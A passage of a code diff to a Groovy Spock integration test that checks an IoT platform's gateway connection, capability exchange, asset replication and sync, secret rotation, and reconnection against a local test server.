-            def gatewayCapabilitiesRequest = ValueUtil.JSON.readValue(capabilitiesEventStr.substring(SharedEvent.MESSAGE_PREFIX.length()), GatewayCapabilitiesRequestEvent.class)
-            messageId = gatewayCapabilitiesRequest.messageID
-        }
-
-        when: "the gateway returns the capabilities"
-        def capabilitiesReplyEvent = new GatewayCapabilitiesResponseEvent(VersionInfo.getGatewayApiVersion(), true)
-        capabilitiesReplyEvent.setMessageID(messageId)
-        gatewayClient.sendMessage(SharedEvent.MESSAGE_PREFIX + ValueUtil.asJSON(capabilitiesReplyEvent).get())
-
-        then: "the gateway connector capabilities should be updated"
-        conditions.eventually {
-            def gatewayConnector = gatewayService.gatewayConnectorMap.get(gateway.getId().toLowerCase(Locale.ROOT))
-            assert gatewayConnector.isConnected()
-            assert !gatewayConnector.isInitialSyncInProgress()
-            assert gatewayConnector.isTunnellingSupported()
-        }
-
-        and: "the central manager should have responded to indicate sync is done"
-        conditions.eventually {
-            def initDoneEventStr = clientReceivedMessages.find {it.contains(GatewayInitDoneEvent.TYPE)}
-            def gatewayInitDoneEvent = ValueUtil.JSON.readValue(initDoneEventStr.substring(SharedEvent.MESSAGE_PREFIX.length()), GatewayInitDoneEvent.class)
-        }
-
-        and: "the gateway client should now be CONNECTED"
-        conditions.eventually {
-            assert connectionStatus == ConnectionStatus.CONNECTED
-            assert gatewayClient.connectionStatus == ConnectionStatus.CONNECTED
-        }
-
-        and: "the gateway asset connection status should be CONNECTED"
-        conditions.eventually {
-            gateway = assetStorageService.find(gateway.getId()) as GatewayAsset
-            assert gateway.getGatewayStatus().orElse(null) == ConnectionStatus.CONNECTED
-        }
-
-        and: "all the gateway assets should be replicated underneath the gateway"
-        conditions.eventually {
-            assert assetStorageService.findAll(new AssetQuery().parents(gateway.getId()).recursive(true)).size() == agentAssets.size() + assets.size()
-        }
-
-        and: "the http client protocol of the gateway agents should not have been linked to the central manager"
-        Thread.sleep(500)
-        conditions.eventually {
-            assert !agentService.protocolInstanceMap.containsKey(agentAssetIds[0])
-            assert !agentService.agents.containsKey(agentAssetIds[0])
-            assert !agentService.protocolInstanceMap.containsKey(agentAssetIds[4])
-            assert !agentService.agents.containsKey(agentAssetIds[4])
-        }
-
-        when: "the previously received messages are cleared"
-        clientReceivedMessages.clear()
-
-        and: "time advances"
-        advancePseudoClock(1, TimeUnit.SECONDS, container)
-
-        and: "an attribute event for a gateway descendant asset (building 1 room 1) is sent to the local manager"
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(mapAssetId(gateway.id, assetIds[1], false), "tempSetpoint", 20d))
-
-        then: "the event should have been forwarded to the gateway"
-        conditions.eventually {
-            assert clientReceivedMessages.size() == 1
-            assert clientReceivedMessages.get(0).startsWith(SharedEvent.MESSAGE_PREFIX)
-            assert clientReceivedMessages.get(0).contains("attribute")
-        }
-
-        when: "the gateway handles the forwarded attribute event and sends a follow up attribute event to the local manager"
-        gatewayClient.sendMessage(SharedEvent.MESSAGE_PREFIX + ValueUtil.asJSON(new AttributeEvent(assetIds[1], "tempSetpoint", 20d)).get())
-
-        then: "the descendant asset in the local manager should contain the new attribute value"
-        conditions.eventually {
-            def building1Room1Asset = assetStorageService.find(mapAssetId(gateway.id, assetIds[1], false))
-            assert building1Room1Asset.getAttribute("tempSetpoint").flatMap { it.getValue() }.orElse(0d) == 20d
-        }
-
-        when: "an asset is added on the gateway and the local manager is notified"
-        def building1Room5AssetId = UniqueIdentifierGenerator.generateId("Test Building 1 Room 5")
-        def building1Room5Asset = new RoomAsset("Test Building 1 Room 5")
-                .setId(building1Room5AssetId)
-                .setCreatedOn(timerService.getNow())
-                .setParentId(assetIds[0])
-                .setRealm(MASTER_REALM)
-        building1Room5Asset.path = (String[]) [building1Room5AssetId, assetIds[0]]
-
-        building1Room5Asset.addOrReplaceAttributes(
-                new Attribute<>(Asset.LOCATION, new GeoJSONPoint(10, 11)).addOrReplaceMeta(
-                        new MetaItem<>(ACCESS_PUBLIC_READ)
-                ),
-                new Attribute<>("temp", NUMBER).addOrReplaceMeta(
-                        new MetaItem<>(AGENT_LINK, new HTTPAgentLink(agentAssetIds[0])
-                                .setPath("")),
-                        new MetaItem<>(UNITS, Constants.units(UNITS_CELSIUS))
-                ),
-                new Attribute<>("tempSetpoint", NUMBER).addMeta(
-                        new MetaItem<>(AGENT_LINK, new HTTPAgentLink(agentAssetIds[0])
-                                .setPath("")),
-                        new MetaItem<>(UNITS, Constants.units(UNITS_CELSIUS))
-                )
-        )
-
-        gatewayClient.sendMessage(SharedEvent.MESSAGE_PREFIX + ValueUtil.asJSON(new AssetEvent(AssetEvent.Cause.CREATE, building1Room5Asset, null)).get())
-
-        then: "the asset should be replicated in the local manager"
-        RoomAsset localBuilding1Room5Asset
-        conditions.eventually {
-            localBuilding1Room5Asset = assetStorageService.find(mapAssetId(gateway.id, building1Room5AssetId, false)) as RoomAsset
-            assert localBuilding1Room5Asset != null
-            assert localBuilding1Room5Asset.getName() == "Test Building 1 Room 5"
-            assert localBuilding1Room5Asset.getType() == RoomAsset.DESCRIPTOR.getName()
-            assert localBuilding1Room5Asset.getRealm() == managerTestSetup.realmBuildingName
-            assert localBuilding1Room5Asset.getParentId() == mapAssetId(gateway.id, assetIds[0], false)
-            assert localBuilding1Room5Asset.getAttributes().size() == 6
-        }
-
-        when: "an asset is modified on the gateway and the local manager is notified"
-        building1Room5Asset.setName("Test Building 1 Room 5 Updated")
-        building1Room5Asset.setVersion(1)
-        building1Room5Asset.addAttributes(
-                new Attribute<>("co2Level", POSITIVE_INTEGER, 500)
-                        .addMeta(
-                                new MetaItem<>(UNITS, Constants.units(UNITS_PART_PER_MILLION)),
-                                new MetaItem<>(AGENT_LINK, new HTTPAgentLink(agentAssetIds[0]).setPath(""))
-                        )
-        )
-        gatewayClient.sendMessage(SharedEvent.MESSAGE_PREFIX + ValueUtil.asJSON(new AssetEvent(AssetEvent.Cause.UPDATE, building1Room5Asset, (String[]) ["name", "attributes"].toArray(new String[0]))).get())
-
-        then: "the asset should also be updated in the local manager"
-        conditions.eventually {
-            localBuilding1Room5Asset = assetStorageService.find(mapAssetId(gateway.id, building1Room5AssetId, false))
-            assert localBuilding1Room5Asset != null
-            assert localBuilding1Room5Asset.getVersion() == 1
-            assert localBuilding1Room5Asset.getName() == "Test Building 1 Room 5 Updated"
-            assert localBuilding1Room5Asset.getType() == RoomAsset.DESCRIPTOR.getName()
-            assert localBuilding1Room5Asset.getRealm() == managerTestSetup.realmBuildingName
-            assert localBuilding1Room5Asset.getParentId() == mapAssetId(gateway.id, assetIds[0], false)
-            assert localBuilding1Room5Asset.getAttributes().size() == 7
-            assert localBuilding1Room5Asset.getAttribute("co2Level").flatMap { it.getValue() }.orElse(0i) == 500i
-        }
-
-        when: "an asset is deleted on the gateway and the local manager is notified"
-        gatewayClient.sendMessage(SharedEvent.MESSAGE_PREFIX + ValueUtil.asJSON(new AssetEvent(AssetEvent.Cause.DELETE, building1Room5Asset, null)).get())
-
-        then: "the asset should also be deleted in the local manager"
-        conditions.eventually {
-            def asset = assetStorageService.find(mapAssetId(gateway.id, building1Room5AssetId, false))
-            assert asset == null
-        }
-
-        when: "the client received messages are cleared"
-        clientReceivedMessages.clear()
-
-        and: "an attempt is made to add a child asset to the gateway in the local manager"
-        assetStorageService.merge(localBuilding1Room5Asset)
-
-        then: "an exception should be thrown"
-        thrown(IllegalStateException)
-
-        when: "the client received messages are cleared"
-        clientReceivedMessages.clear()
-
-        and: "an attempt is made to modify a child asset of the gateway in the local manager"
-        localBuilding1Room5Asset.setName("Test Building 1 Room 5")
-        localBuilding1Room5Asset.getAttributes().remove("co2Level")
-        localBuilding1Room5Asset = assetStorageService.merge(localBuilding1Room5Asset)
-
-        then: "an exception should be thrown"
-        thrown(IllegalStateException)
-
-        when: "an attempt is made to delete a child asset of the gateway in the local manager"
-        assetStorageService.delete([mapAssetId(gateway.id, assetIds[0], false)])
-
-        then: "an exception should be thrown"
-        thrown(IllegalStateException)
-
-        then: "the asset should not have been deleted"
-        assert assetStorageService.find(mapAssetId(gateway.id, assetIds[0], false)) != null
-
-        when: "time advances"
-        advancePseudoClock(1, TimeUnit.SECONDS, container)
-
-        and: "the gateway asset is marked as disabled"
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(gateway.getId(), GatewayAsset.DISABLED, true))
-
-        then: "the gateway asset status should become DISCONNECTED"
-        conditions.eventually {
-            gateway = assetStorageService.find(gateway.getId(), true)
-            assert gateway.getGatewayStatus().orElse(null) == ConnectionStatus.DISCONNECTED
-        }
-
-        and: "the gateway connector should be marked as disconnected and the gateway client should have been disconnected"
-        conditions.eventually {
-            assert gatewayService.gatewayConnectorMap.get(gateway.getId().toLowerCase(Locale.ROOT)).disabled
-            assert !gatewayService.gatewayConnectorMap.get(gateway.getId().toLowerCase(Locale.ROOT)).connected
-        }
-
-        when: "an attempt is made to add a descendant asset to a gateway that isn't connected"
-        gatewayClient.disconnect()
-        def failedAsset = new BuildingAsset("Failed Asset")
-                .setId(UniqueIdentifierGenerator.generateId("Failed asset"))
-                .setCreatedOn(timerService.getNow())
-                .setParentId(gateway.id)
-                .setRealm(managerTestSetup.realmBuildingName)
-        failedAsset.path = (String[]) [UniqueIdentifierGenerator.generateId("Failed asset")].toArray(new String[0])
-        failedAsset.addOrReplaceAttributes(
-                new Attribute<>(Asset.LOCATION, new GeoJSONPoint(10, 11)).addMeta(
-                        new MetaItem<>(ACCESS_PUBLIC_READ)
-                )
-        )
-        assetStorageService.merge(failedAsset)
-
-        then: "an error should occur"
-        thrown(IllegalStateException)
-
-        when: "gateway assets are modified whilst the gateway is disconnected (building1Room5 re-added, building5 and descendants removed and building1 modified and building1Room1 attribute updated)"
-        assets[4].setName("Test Building 1 Updated")
-        assets[4].setVersion(2L)
-        assets[0].getAttribute("temp").ifPresent { it.setValue(10) }
-        assets = assets.subList(0, 20)
-
-        and: "the client received messages are cleared"
-        clientReceivedMessages.clear()
-
-        and: "time advances"
-        advancePseudoClock(1, TimeUnit.SECONDS, container)
-
-        and: "the gateway is enabled again"
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(gateway.getId(), GatewayAsset.DISABLED.getName(), false))
-
-        then: "the gateway connector should be enabled"
-        conditions.eventually {
-            assert !gatewayService.gatewayConnectorMap.get(gateway.getId().toLowerCase(Locale.ROOT)).disabled
-        }
-
-        when: "the gateway asset client secret attribute is updated"
-        def newSecret = UUID.randomUUID().toString()
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(gateway.getId(), GatewayAsset.CLIENT_SECRET, newSecret))
-
-        then: "the service user secret should be updated"
-        conditions.eventually {
-            gateway = assetStorageService.find(gateway.getId()) as GatewayAsset
-            assert gateway.getClientSecret().orElse(null) == newSecret
-            def user = identityProvider.getUserByUsername(gateway.getRealm(), User.SERVICE_ACCOUNT_PREFIX + gateway.getClientId().orElse(""))
-            assert user != null
-            assert user.secret == newSecret
-        }
-
-        when: "the gateway client reconnects with the new secret"
-        gatewayClient = new WebsocketIOClient<String>(
-                new URIBuilder("ws://127.0.0.1:$serverPort/websocket/events?Realm=$managerTestSetup.realmBuildingName").build(),
-                null,
-                new OAuthClientCredentialsGrant("http://127.0.0.1:$serverPort/auth/realms/$managerTestSetup.realmBuildingName/protocol/openid-connect/token",
-                        gateway.getClientId().orElse(""),
-                        gateway.getClientSecret().orElse(""),
-                        null).setBasicAuthHeader(true))
-        gatewayClient.setEncoderDecoderProvider({
-            [new AbstractNettyIOClient.MessageToMessageDecoder<String>(String.class, gatewayClient)].toArray(new ChannelHandler[0])
-        })
-        gatewayClient.addMessageConsumer({
-            message -> clientReceivedMessages.add(message)
-        })
-        gatewayClient.addConnectionStatusConsumer({
-            status -> connectionStatus = status
-        })
-        gatewayClient.connect()
-
-        then: "the gateway netty client status should become CONNECTING"
-        conditions.eventually {
-            assert connectionStatus == ConnectionStatus.CONNECTING
-            assert gatewayClient.connectionStatus == ConnectionStatus.CONNECTING
-        }
-
-        and: "the gateway asset connection status should be CONNECTING"
-        conditions.eventually {
-            gateway = assetStorageService.find(gateway.getId())
-            assert gateway.getGatewayStatus().orElse(null) == ConnectionStatus.CONNECTING
-        }
-
-        and: "the local manager should have sent an asset read request"
-        conditions.eventually {
-            assert clientReceivedMessages.size() >= 1
-            assert clientReceivedMessages.find { it.startsWith(SharedEvent.MESSAGE_PREFIX) && it.contains("read-assets") } != null
-        }
-
-        when: "the previously received messages are cleared"
-        clientReceivedMessages.clear()
-
-        and: "the gateway client replies to the central manager with the assets of the gateway"
-        sendAssets = [building1Room5Asset]
-        sendAssets.addAll(agentAssets)
-        sendAssets.addAll(assets)
-        readAssetsReplyEvent = new AssetsEvent(sendAssets)
-        readAssetsReplyEvent.setMessageID(GatewayConnector.ASSET_READ_EVENT_NAME_INITIAL)
-        gatewayClient.sendMessage(SharedEvent.MESSAGE_PREFIX + ValueUtil.asJSON(readAssetsReplyEvent).get())
-
-        then: "the central manager should have requested the full loading of the first batch of assets"
-        conditions.eventually {
-            assert clientReceivedMessages.size() == 1
-            assert clientReceivedMessages.get(0).contains("read-assets")
-            readAssetsEvent = ValueUtil.JSON.readValue(clientReceivedMessages[0].substring(SharedEvent.MESSAGE_PREFIX.length()), ReadAssetsEvent.class)
-            messageId = readAssetsEvent.messageID
-            assert messageId == GatewayConnector.ASSET_READ_EVENT_NAME_BATCH + "0"
-            assert readAssetsEvent.assetQuery != null
-            assert readAssetsEvent.assetQuery.ids != null
-            assert readAssetsEvent.assetQuery.ids.length == GatewayConnector.SYNC_ASSET_BATCH_SIZE
-            assert agentAssetIds.stream().filter { readAssetsEvent.assetQuery.ids.contains(it) }.count() == agentAssetIds.size()
-            assert assetIds.stream().filter { readAssetsEvent.assetQuery.ids.contains(it) }.count() + 1 == GatewayConnector.SYNC_ASSET_BATCH_SIZE - agentAssetIds.size()
-        }
-
-        when: "another asset is added to the gateway during the initial sync process"
-        def building2Room5Asset = new RoomAsset("Test Building 2 Room 5")
-                .setId(UniqueIdentifierGenerator.generateId("Test Building 2 Room 5"))
-                .setCreatedOn(timerService.getNow())
-                .setParentId(assetIds[5])
-                .setRealm(MASTER_REALM)
-        building2Room5Asset.path = (String[]) [UniqueIdentifierGenerator.generateId("Test Building 2 Room 5"), assetIds[5]]
-
-        building2Room5Asset.addOrReplaceAttributes(
-                new Attribute<>(Asset.LOCATION, new GeoJSONPoint(10, 11)).addOrReplaceMeta(
-                        new MetaItem<>(ACCESS_PUBLIC_READ)
-                ),
-                new Attribute<>("temp", NUMBER).addOrReplaceMeta(
-                        new MetaItem<>(AGENT_LINK, new HTTPAgentLink(agentAssetIds[1])
-                                .setPath("")),
-                        new MetaItem<>(UNITS, Constants.units(UNITS_CELSIUS))
-                ),
-                new Attribute<>("tempSetpoint", NUMBER).addMeta(
-                        new MetaItem<>(AGENT_LINK, new HTTPAgentLink(agentAssetIds[1])
-                                .setPath("")),
-                        new MetaItem<>(UNITS, Constants.units(UNITS_CELSIUS))
-                )
-        )
-
-        gatewayClient.sendMessage(SharedEvent.MESSAGE_PREFIX + ValueUtil.asJSON(new AssetEvent(AssetEvent.Cause.CREATE, building2Room5Asset, null)).get())
-
-        and: "another asset is deleted from the gateway during the initial sync process (Building 3 Room 1)"
-        def removedAsset = assets.remove(10)
-        gatewayClient.sendMessage(SharedEvent.MESSAGE_PREFIX + ValueUtil.asJSON(new AssetEvent(AssetEvent.Cause.DELETE, removedAsset, null)).get())
-
-        and: "the gateway returns the requested assets (minus the deleted Building 3 Room 1 asset)"
-        sendAssets = [building1Room5Asset]
-        sendAssets.addAll(agentAssets)
-        sendAssets.addAll(Arrays.stream(readAssetsEvent.assetQuery.ids).filter { !agentAssetIds.contains(it) && it != removedAsset.id && it != building1Room5Asset.id }.map { id -> assets.stream().filter { it.id == id }.findFirst().orElse(null) }.collect(Collectors.toList()))
-        readAssetsReplyEvent = new AssetsEvent(sendAssets)
-        readAssetsReplyEvent.setMessageID(messageId)
-        gatewayClient.sendMessage(SharedEvent.MESSAGE_PREFIX + ValueUtil.asJSON(readAssetsReplyEvent).get())
-
-        then: "the central manager should have requested the full loading of the second batch of assets"
-        conditions.eventually {
-            assert clientReceivedMessages.size() == 2
-            assert clientReceivedMessages.get(1).contains("read-assets")
-            readAssetsEvent = ValueUtil.JSON.readValue(clientReceivedMessages[1].substring(SharedEvent.MESSAGE_PREFIX.length()), ReadAssetsEvent.class)
-            messageId = readAssetsEvent.messageID
-            assert messageId == GatewayConnector.ASSET_READ_EVENT_NAME_BATCH + (GatewayConnector.SYNC_ASSET_BATCH_SIZE - 1)
-            assert readAssetsEvent.assetQuery != null
-            assert readAssetsEvent.assetQuery.ids != null
-            assert readAssetsEvent.assetQuery.ids.length == agentAssetIds.size() + assets.size() + 1 - GatewayConnector.SYNC_ASSET_BATCH_SIZE + 1
-            assert assets.stream().filter { asset -> sendAssets.stream().noneMatch { it.id == asset.id } }.count() == readAssetsEvent.assetQuery.ids.length
-        }
-
-        when: "the gateway returns the requested assets"
-        sendAssets = new CopyOnWriteArrayList<>()
-        sendAssets.addAll(Arrays.stream(readAssetsEvent.assetQuery.ids).map { id -> assets.stream().filter { asset -> asset.id == id }.findFirst().orElse(null) }.collect(Collectors.toList()))
-        readAssetsReplyEvent = new AssetsEvent(sendAssets)
-        readAssetsReplyEvent.setMessageID(messageId)
-        gatewayClient.sendMessage(SharedEvent.MESSAGE_PREFIX + ValueUtil.asJSON(readAssetsReplyEvent).get())
-
-        then: "the central manager should have requested the capabilities of the gateway"
-        conditions.eventually {
-            assert clientReceivedMessages.size() == 3
-            assert clientReceivedMessages.get(2).contains(GatewayCapabilitiesRequestEvent.TYPE)
-            def gatewayCapabilitiesRequest = ValueUtil.JSON.readValue(clientReceivedMessages[2].substring(SharedEvent.MESSAGE_PREFIX.length()), GatewayCapabilitiesRequestEvent.class)
-            messageId = gatewayCapabilitiesRequest.messageID
-        }
-
-        when: "The Gateway also sends a Gateway Capabilities response indicating tunnelling is supported"
-        capabilitiesReplyEvent.setMessageID(messageId)
-        capabilitiesReplyEvent = new GatewayCapabilitiesResponseEvent(VersionInfo.getGatewayApiVersion(), true)
-        gatewayClient.sendMessage(SharedEvent.MESSAGE_PREFIX + ValueUtil.asJSON(capabilitiesReplyEvent).get())
-
-
-        then: "the gateway connector sync should be completed"
-        conditions.eventually {
-            def gatewayConnector = gatewayService.gatewayConnectorMap.get(gateway.getId().toLowerCase(Locale.ROOT))
-            assert gatewayConnector.isConnected()
-            assert !gatewayConnector.isInitialSyncInProgress()
-        }
-
-        and: "the gateway netty client status should become CONNECTED"
-        conditions.eventually {
-            assert connectionStatus == ConnectionStatus.CONNECTED
-            assert gatewayClient.connectionStatus == ConnectionStatus.CONNECTED
-        }
-
-        and: "the gateway asset connection status should be CONNECTED"
-        conditions.eventually {
-            gateway = assetStorageService.find(gateway.getId())
-            assert gateway.getGatewayStatus().orElse(null) == ConnectionStatus.CONNECTED
-            assert gateway.getTunnelingSupported().get() == true
-        }
-
-        and: "the gateway should have the correct assets"
-        def gatewayAssets = assetStorageService.findAll(new AssetQuery().parents(gateway.getId()).recursive(true))
-        assert gatewayAssets.size() == 2 + agentAssets.size() + assets.size()
-
-        when: "the gateway asset is deleted"
-        def deleted = assetStorageService.delete([gateway.id])
-
-        then: "all descendant assets should have been removed"
-        conditions.eventually {
-            assert assetStorageService.find(mapAssetId(gateway.id, assets[0].id, true)) == null
-        }
-
-        then: "the keycloak client should also be removed"
-        assert deleted
-        conditions.eventually {
-            assert identityProvider.getClient(managerTestSetup.realmBuildingName, getGatewayClientId(gateway.getId())) == null
-        }
-
-        cleanup: "cleanup the gateway client"
-        if (gatewayClient != null) {
-            gatewayClient.disconnect()
-            gatewayClient.removeAllMessageConsumers()
-        }
+    gatewayClient.sendMessage(SharedEvent.MESSAGE_PREFIX + ValueUtil.asJSON(new AssetEvent(AssetEvent.Cause.CREATE, building1Room5Asset, null)).get())
+
+    then: "the asset should be replicated in the local manager"
+    RoomAsset localBuilding1Room5Asset
+    conditions.eventually {
+      localBuilding1Room5Asset = assetStorageService.find(mapAssetId(gateway.id, building1Room5AssetId, false)) as RoomAsset
+      assert localBuilding1Room5Asset != null
+      assert localBuilding1Room5Asset.getName() == "Test Building 1 Room 5"
+      assert localBuilding1Room5Asset.getType() == RoomAsset.DESCRIPTOR.getName()
+      assert localBuilding1Room5Asset.getRealm() == managerTestSetup.realmBuildingName
+      assert localBuilding1Room5Asset.getParentId() == mapAssetId(gateway.id, assetIds[0], false)
+      assert localBuilding1Room5Asset.getAttributes().size() == 6
     }
 
-    def "Verify gateway client service"() {
+    when: "an asset is modified on the gateway and the local manager is notified"
+    building1Room5Asset.setName("Test Building 1 Room 5 Updated")
+    building1Room5Asset.setVersion(1)
+    building1Room5Asset.addAttributes(
+            new Attribute<>("co2Level", POSITIVE_INTEGER, 500)
+            .addMeta(
+                    new MetaItem<>(UNITS, Constants.units(UNITS_PART_PER_MILLION)),
+                    new MetaItem<>(AGENT_LINK, new HTTPAgentLink(agentAssetIds[0]).setPath(""))
+                    )
+            )
+    gatewayClient.sendMessage(SharedEvent.MESSAGE_PREFIX + ValueUtil.asJSON(new AssetEvent(AssetEvent.Cause.UPDATE, building1Room5Asset, (String[]) ["name", "attributes"].toArray(new String[0]))).get())
 
-        given: "the container environment is started"
-        def conditions = new PollingConditions(timeout: 30, delay: 0.2)
-        def delayedConditions = new PollingConditions(initialDelay: 1, delay: 1, timeout: 10)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def timerService = container.getService(TimerService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def gatewayService = container.getService(GatewayService.class)
-        def gatewayClientService = container.getService(GatewayClientService.class)
-        def agentService = container.getService(AgentService.class)
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def clientEventService = container.getService(ClientEventService.class)
-
-        and: "an authenticated admin user"
-        def accessToken = authenticate(
-                container,
-                MASTER_REALM,
-                KEYCLOAK_CLIENT_ID,
-                MASTER_REALM_ADMIN_USER,
-                getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
-        )
-
-
-        and: "the gateway client resource"
-        def gatewayClientResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(GatewayClientResource.class)
-
-        expect: "the system should settle down"
-        conditions.eventually {
-            assert noEventProcessedIn(assetProcessingService, 300)
-        }
-
-        when: "a gateway is provisioned in this manager in the building realm"
-        GatewayAsset gateway = assetStorageService.merge(new GatewayAsset("Test gateway")
-                .setRealm(managerTestSetup.realmBuildingName))
-
-        then: "a set of credentials should have been created for this gateway and be stored against the gateway for easy reference"
-        conditions.eventually {
-            gateway = assetStorageService.find(gateway.getId(), true) as GatewayAsset
-            assert !isNullOrEmpty(gateway.getClientId().orElse(null))
-            assert !isNullOrEmpty(gateway.getClientSecret().orElse(null))
-        }
-
-        and: "a gateway connector should have been created for this gateway"
-        conditions.eventually {
-            assert gatewayService.gatewayConnectorMap.size() == 1
-            assert gatewayService.gatewayConnectorMap.get(gateway.getId().toLowerCase(Locale.ROOT)).gatewayId == gateway.getId()
-        }
-
-        when: "a gateway client connection is created to connect the city realm to the gateway in the building realm"
-        def gatewayConnection = new GatewayConnection(
-                managerTestSetup.realmCityName,
-                "127.0.0.1",
-                serverPort,
-                managerTestSetup.realmBuildingName,
-                gateway.getClientId().orElse(""),
-                gateway.getClientSecret().orElse(""),
-                false,
-                null,
-                Map.of("test", new GatewayAssetSyncRule()),
-                false
-        )
-        gatewayClientResource.setConnection(null, managerTestSetup.realmCityName, gatewayConnection)
-
-        then: "the gateway client should become connected"
-        conditions.eventually {
-            assert gatewayClientService.connectionRealmMap.get(managerTestSetup.realmCityName) != null
-        }
-
-        and: "the gateway asset connection status should become CONNECTED"
-        conditions.eventually {
-            gateway = assetStorageService.find(gateway.getId())
-            assert gateway.getGatewayStatus().orElse(null) == ConnectionStatus.CONNECTED
-        }
-
-        and: "the assets should have been created under the gateway asset"
-        conditions.eventually {
-            def gatewayAssets = assetStorageService.findAll(new AssetQuery().parents(gateway.id).recursive(true))
-            def cityAssets = assetStorageService.findAll(new AssetQuery().realm(new RealmPredicate(managerTestSetup.realmCityName)))
-            assert gatewayAssets.size() == cityAssets.size()
-        }
-
-        when: "the gateway client is abruptly disconnected"
-        // Overwrite the client connection status to prevent reconnection
-        gatewayClientService.connectionRealmMap.get(managerTestSetup.realmCityName).client.connectionStatus = ConnectionStatus.DISCONNECTED
-        gatewayClientService.connectionRealmMap.get(managerTestSetup.realmCityName).client.channel.close()
-
-        then: "the gateway asset connection status should become DISCONNECTED"
-        conditions.eventually {
-            gateway = assetStorageService.find(gateway.getId())
-            assert gateway.getGatewayStatus().orElse(null) == ConnectionStatus.DISCONNECTED
-        }
-
-        when: "the connection is reestablished"
-        gatewayClientService.connectionRealmMap.get(managerTestSetup.realmCityName).client.connect()
-
-        then: "the gateway asset connection status should become CONNECTED"
-        conditions.eventually {
-            gateway = assetStorageService.find(gateway.getId())
-            assert gateway.getGatewayStatus().orElse(null) == ConnectionStatus.CONNECTED
-        }
-
-        when: "a gateway client asset is modified"
-        MicrophoneAsset microphone1 = assetStorageService.find(managerTestSetup.microphone1Id)
-        microphone1.setName("Microphone 1 Updated")
-        microphone1.addAttributes(
-                new Attribute<>("test", NUMBER, 100d)
-        )
-        microphone1 = assetStorageService.merge(microphone1)
-
-        then: "the mirrored asset under the gateway should have also been updated"
-        conditions.eventually {
-            def mirroredMicrophone = assetStorageService.find(mapAssetId(gateway.id, managerTestSetup.microphone1Id, false))
-            assert mirroredMicrophone != null
-            assert mirroredMicrophone.getAttributes().get(MicrophoneAsset.SOUND_LEVEL).flatMap { it.getMetaItem(READ_ONLY) }.flatMap { it.getValue() }.orElse(false)
-            assert mirroredMicrophone.getAttribute("test").isPresent()
-            assert mirroredMicrophone.getAttribute("test").flatMap { it.getValue() }.orElse(0d) == 100d
-        }
-
-        when: "a gateway client asset is added"
-        MicrophoneAsset microphone2 = new MicrophoneAsset("Microphone 2")
-                .setRealm(managerTestSetup.realmCityName)
-                .setParentId(managerTestSetup.area1Id)
-                .addAttributes(
-                        new Attribute<>("test", TEXT, "testValue")
-                )
-        microphone2 = assetStorageService.merge(microphone2)
-
-        then: "the new asset should have been created in the gateway and also mirrored under the gateway asset"
-        assert microphone2.id != null
-        conditions.eventually {
-            def mirroredMicrophone2 = assetStorageService.find(mapAssetId(gateway.id, microphone2.id, false))
-            assert mirroredMicrophone2 != null
-            assert mirroredMicrophone2.getAttributes().get(MicrophoneAsset.SOUND_LEVEL).isPresent()
-            assert mirroredMicrophone2.getAttribute("test").flatMap { it.getValue() }.orElse("") == "testValue"
-        }
-
-        when: "an attempt is made to add an asset under the gateway asset"
-        def microphone3 = ValueUtil.clone(microphone1)
-                .setName("Microphone 3")
-                .setId(null)
-                .setRealm(managerTestSetup.realmBuildingName)
-                .setParentId(mapAssetId(gateway.id, managerTestSetup.area1Id, false))
-        microphone3 = assetStorageService.merge(microphone3)
-
-        then: "an exception should be thrown"
-        thrown(IllegalStateException)
-
-        when: "an asset with a type unknown on the central instance is added on the gateway"
-        // We simulate this as both edge and central are in the same instance here in the test
-        def msgEvent = new AssetEvent(
-                AssetEvent.Cause.CREATE,
-                new BuildingAsset("UnknownAssetType")
-                        .setId(UniqueIdentifierGenerator.generateId()),
-                null
-        )
-        msgEvent.asset.type = "CustomBuildingAsset"
-        gatewayClientService.connectionRealmMap.get(gatewayConnection.getLocalRealm()).sendCentralManagerMessage(msgEvent)
-
-        then: "it should be added to the central instance as a thing asset"
-        conditions.eventually {
-            def mirroredCustomAssetType = assetStorageService.find(mapAssetId(gateway.id, msgEvent.asset.id, false))
-            assert mirroredCustomAssetType != null
-            assert mirroredCustomAssetType instanceof UnknownAsset
-            assert mirroredCustomAssetType.type == "CustomBuildingAsset"
-        }
-
-        when: "an attribute is updated on the gateway client"
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(microphone2.id, "test", "newValue"))
-
-        then: "the mirrored asset attribute should also be updated"
-        conditions.eventually {
-            def mirroredMicrophone2 = assetStorageService.find(mapAssetId(gateway.id, microphone2.id, false))
-            assert mirroredMicrophone2 != null
-            assert mirroredMicrophone2.getAttribute("test").flatMap { it.getValue() }.orElse("") == "newValue"
-        }
-
-        when: "time advances"
-        advancePseudoClock(1, TimeUnit.SECONDS, container)
-
-        and: "a mirrored asset attribute is updated"
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(mapAssetId(gateway.id, microphone2.id, false), "test", "newerValue"))
-
-        then: "the attribute should be updated on the gateway client and the mirrored asset"
-        conditions.eventually {
-            microphone2 = assetStorageService.find(microphone2.id)
-            def mirroredMicrophone2 = assetStorageService.find(mapAssetId(gateway.id, microphone2.id, false))
-            assert microphone2 != null
-            assert mirroredMicrophone2 != null
-            assert microphone2.getAttribute("test").flatMap { it.getValue() }.orElse("") == "newerValue"
-            assert mirroredMicrophone2.getAttribute("test").flatMap { it.getValue() }.orElse("") == "newerValue"
-        }
-
-        when: "we subscribe to attribute events"
-        List<AttributeEvent> attributeEvents = new CopyOnWriteArrayList<>()
-        Consumer<AttributeEvent> eventConsumer = { attributeEvent ->
-            attributeEvents.add(attributeEvent)
-        }
-        clientEventService.addSubscription(AttributeEvent.class, null, eventConsumer)
-
-        and: "an attribute with an attribute link is updated on the gateway"
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.light2Id, LightAsset.ON_OFF, true))
-
-        then: "only four attribute events should have been generated, one for each of light1 and light2 and one for each of their mirrored assets below the gateway asset"
-        delayedConditions.eventually {
